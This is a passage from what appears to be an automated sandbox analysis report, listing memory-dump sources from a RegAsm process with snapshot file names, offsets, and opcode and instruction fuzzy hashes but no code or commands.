                          • Instruction Fuzzy Hash: A411B176504384CFCB16CF54D9C4B16BFB1FB84318F2486A9D9094B696C33AD456CBA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215283340.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13ed000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a5504dfd99aeaae02a5904faf24bf7c180eb56da23d91347c8bcbb22ee6d9b3
                          • Instruction ID: cad4704b0d5c5fe0183dc55a87c773c857fa4cf2b1732835ebf94e68ddfe8a11
                          • Opcode Fuzzy Hash: 5a5504dfd99aeaae02a5904faf24bf7c180eb56da23d91347c8bcbb22ee6d9b3
                          • Instruction Fuzzy Hash: 9311E176404380CFCB02CF44D9C4B56BFA2FB94328F24C5A9D8090B656C33AE456CFA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215419083.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_13fd000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3adcda68119555c6f25b62d92a5950083e81dc615a2459920abefbb8922beed6
                          • Instruction ID: 4849cc02dca3ebd2c70254a6df8b88333083735f168aca312222bb319ad7f800
                          • Opcode Fuzzy Hash: 3adcda68119555c6f25b62d92a5950083e81dc615a2459920abefbb8922beed6
                          • Instruction Fuzzy Hash: DB11BE79504280DFCB02CF54C6C4B15BB61FB84228F24C6AED9494B656C33AD44ACB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a6beab3de5712b0e181e6b516eb903016c0313060f042ad2a31d6375d320693
                          • Instruction ID: dc7cec11676b62262026afd06ad2eac8f2a10a3480e0770e58307ea422eb9d54
                          • Opcode Fuzzy Hash: 3a6beab3de5712b0e181e6b516eb903016c0313060f042ad2a31d6375d320693
                          • Instruction Fuzzy Hash: B8E0E574E00208EFCB44DFA8D944A9DFBF5FB48310F10C1AA9818A3340D735AA51DF80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a6beab3de5712b0e181e6b516eb903016c0313060f042ad2a31d6375d320693
                          • Instruction ID: 11866c773b30c93aa783baefe5259ae61a82585b8e75f681a8c87aa76d614297
                          • Opcode Fuzzy Hash: 3a6beab3de5712b0e181e6b516eb903016c0313060f042ad2a31d6375d320693
                          • Instruction Fuzzy Hash: 91E0E574E00208EFCB44DFA8D544A9DFBF4FB48310F10C1AA9818A3340D731AA51DF84
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a6beab3de5712b0e181e6b516eb903016c0313060f042ad2a31d6375d320693
                          • Instruction ID: e0904befcd2f9f5ae3251e886ea3c6a7ca3d2a57f16b8311bea598bda2c71136
                          • Opcode Fuzzy Hash: 3a6beab3de5712b0e181e6b516eb903016c0313060f042ad2a31d6375d320693
                          • Instruction Fuzzy Hash: 32E0E578E00208EFCB54DFA8D545A9DFBF4FB88310F10C1AA9818A3340D732AA51DF81
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d761a6c46bf016c88af7f7a819ebcdf7db1eca8c014e6832d0a7c70a93b2614
                          • Instruction ID: 7a10256e00634f588dd28ff82a15732504d3f1a986b2d5c2c07b10449612156a
                          • Opcode Fuzzy Hash: 0d761a6c46bf016c88af7f7a819ebcdf7db1eca8c014e6832d0a7c70a93b2614
                          • Instruction Fuzzy Hash: B5E01234D04208ABCB04DBA8E440AACBBB4EB88300F1081EE881853380D6319E42DB80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a79d6321d819598928595b8b1410df33bb64db383645de52513376096e7775d0
                          • Instruction ID: 8e782a3932b7c7bd487f8942b73179b1297a9037c5fec86c5749f367a133a8b5
                          • Opcode Fuzzy Hash: a79d6321d819598928595b8b1410df33bb64db383645de52513376096e7775d0
                          • Instruction Fuzzy Hash: B4E01238904208EBCB14DFA4E541A5DBB74FB45314F1081EDC81917340C7719E42DB81
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3037637a5edc319c45343de6d9a50c764ac5bc27680c55647a62e3ec102159b6
                          • Instruction ID: c28e6ef7df4e93a41449da5c7d94ae45cb5671c21df46d9372ed8aa3d90644c6
                          • Opcode Fuzzy Hash: 3037637a5edc319c45343de6d9a50c764ac5bc27680c55647a62e3ec102159b6
                          • Instruction Fuzzy Hash: 7BE0E274D04208AFCB54EFB8E549B9DBBF8AB04305F1001A99808A3240E7705A84CB81
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226583608.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a70000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c383840f5a57f91131296c634307d1c4d906f8ca870db1e1dcdb5e92b27b7a6
                          • Instruction ID: 0fd3a5b62aae20188f27c792b5dbfbad8349b2f986f05064c479e9ac37dbc3b4
                          • Opcode Fuzzy Hash: 7c383840f5a57f91131296c634307d1c4d906f8ca870db1e1dcdb5e92b27b7a6
                          • Instruction Fuzzy Hash: AFD19B70B057088FDB19DB75C958B6EBBF7AF88200F1444AED1569B290DB34D902CBA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a32087d4ed3549278e32523eba9654d2c69db0901a5ea543f83201191d2bcc98
                          • Instruction ID: 144e291e81391026102890c4c6edbabe15e1195f8ee19ac12ed0ddfce4a90bd9
                          • Opcode Fuzzy Hash: a32087d4ed3549278e32523eba9654d2c69db0901a5ea543f83201191d2bcc98
                          • Instruction Fuzzy Hash: 771294B44817468AE730CF65E98C18D3BB1B745338BB0C709DA616B2E9DBB4158BCF64
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ccf480c8ae2440d7af422f82e7b51d973b91a0c7ff27b6edee95f248dfde1b3
                          • Instruction ID: 20a2f77d75c57002f0191474e86c007f65560874dab0a6a3801be73b8e6202c7
                          • Opcode Fuzzy Hash: 1ccf480c8ae2440d7af422f82e7b51d973b91a0c7ff27b6edee95f248dfde1b3
                          • Instruction Fuzzy Hash: 52A15E32B00219CFCF15DFA5C8445AEBBB2FF84301B1585AEE806AB365DB71E945CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5eb35ff4f2e234b7ff45ab47468dc14bc750f63adcce14e106cc5f72795b9127
                          • Instruction ID: be461b5304c30a712b89a235c7cdcc4ab172752023b028caf95dafa31a322eff
                          • Opcode Fuzzy Hash: 5eb35ff4f2e234b7ff45ab47468dc14bc750f63adcce14e106cc5f72795b9127
                          • Instruction Fuzzy Hash: A8C1F6B48817468BE720CF65E88818D7BB1BB85334F71C709D6616B2E9DBB8148BCF54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224955481.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_56c0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 83fd2cf587c9e2293e24cfeb914e4f76a742ecc8274bb6e06c245b1346467f06
                          • Instruction ID: 050bb20b5d9e1613e8c1f208219e7f964e8eb4229d57a44d81864fac41d0c5b9
                          • Opcode Fuzzy Hash: 83fd2cf587c9e2293e24cfeb914e4f76a742ecc8274bb6e06c245b1346467f06
                          • Instruction Fuzzy Hash: E7C1F5B04817468BE724CF69E88818D7BB1FB85334B70C709D6616B2D9DBB8148BCF54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226641379.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ab0000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba2671479230034eada25645b84ad484244e44ef6c47dad872d37306177a4348
                          • Instruction ID: adab3e140b7c6a94d2369b1294dc5e141adfa5262af16afc0173c164edd9cc4d
                          • Opcode Fuzzy Hash: ba2671479230034eada25645b84ad484244e44ef6c47dad872d37306177a4348
                          • Instruction Fuzzy Hash: 3381C070D05228CEDB24DFA9D854BAEBFB6BF89324F1080A9D02DAB254DB745985CF41
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c03f10f0465b1eee087d8a662385a500304968cfc461befd6469e550bc3318a0
                          • Instruction ID: 0d0f1981f1512d2fe7843233d17f03aa25356c645b62780cdd8c0d9f2eb20a75
                          • Opcode Fuzzy Hash: c03f10f0465b1eee087d8a662385a500304968cfc461befd6469e550bc3318a0
                          • Instruction Fuzzy Hash: EC71F1B0D01219CFEB44CFA9C5447EEBBF5FB88315F11806AD919B3265DB780A8ACB54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0cbbfee2acf6cc3f0c4f54713b7408e0930c59dbf2c4e0c5b9cb8379bfe420fd
                          • Instruction ID: 59bc1437a13b68984d705ac1a8a76073107d1cda6438398470939e7f8e1a010c
                          • Opcode Fuzzy Hash: 0cbbfee2acf6cc3f0c4f54713b7408e0930c59dbf2c4e0c5b9cb8379bfe420fd
                          • Instruction Fuzzy Hash: 066103B0D01219CFEB84CFA9C5447EEBBF5BB88310F15806AD819B3265DB780A49CF54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 746d280cc90637dac0c5217a2629e0d786e68c652f70924e2b84f869810096aa
                          • Instruction ID: c429f4aae381638a1c8807aab47466f11f0af4896d9a2015b5d093c6ccff3f79
                          • Opcode Fuzzy Hash: 746d280cc90637dac0c5217a2629e0d786e68c652f70924e2b84f869810096aa
                          • Instruction Fuzzy Hash: 7F712470A00609CFDB58DF6AE84469ABFF6FBC8304F04C22ED415AB268EF745946CB44
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 249ba3f8ec94e661c8dba2400ffa8fba694010bf893394f5c48b219f92653821
                          • Instruction ID: 586dadcfca94f7098d4c0b66c4cabd8a33c7b39dc31ad5dfadd1984d69b2da5c
                          • Opcode Fuzzy Hash: 249ba3f8ec94e661c8dba2400ffa8fba694010bf893394f5c48b219f92653821
                          • Instruction Fuzzy Hash: 1B711570A0064A8FDB58DF6BE85469ABFF6FBC8304F04C12DD415AB268EF745846CB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14889729ac95ce42e6ef88d4f0e36f292d631e2f3c966f675a28b330d7589566
                          • Instruction ID: f3885d4dadc9ee81f7866c585cbae0570f8a04e7d2c8eff947c53d0ab0f2a6d4
                          • Opcode Fuzzy Hash: 14889729ac95ce42e6ef88d4f0e36f292d631e2f3c966f675a28b330d7589566
                          • Instruction Fuzzy Hash: 2B21DB71E016188BEB5CCF6B89402DEFAF7AFC9300F54C0BAC948A6225DB740A858E40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e93405ba1a0e4acf8feae04180fbd8ec7fb15fff5fef04837b78e529c3919fa
                          • Instruction ID: 331ebad3ae7ac6941052af1709710e42c84c32fd6a7160971f5f8b563a36b646
                          • Opcode Fuzzy Hash: 6e93405ba1a0e4acf8feae04180fbd8ec7fb15fff5fef04837b78e529c3919fa
                          • Instruction Fuzzy Hash: 3C219E71E016188BDB5CCF6B89402DAFBF7AFCD310F58C1BAC548A6265DB740A858F54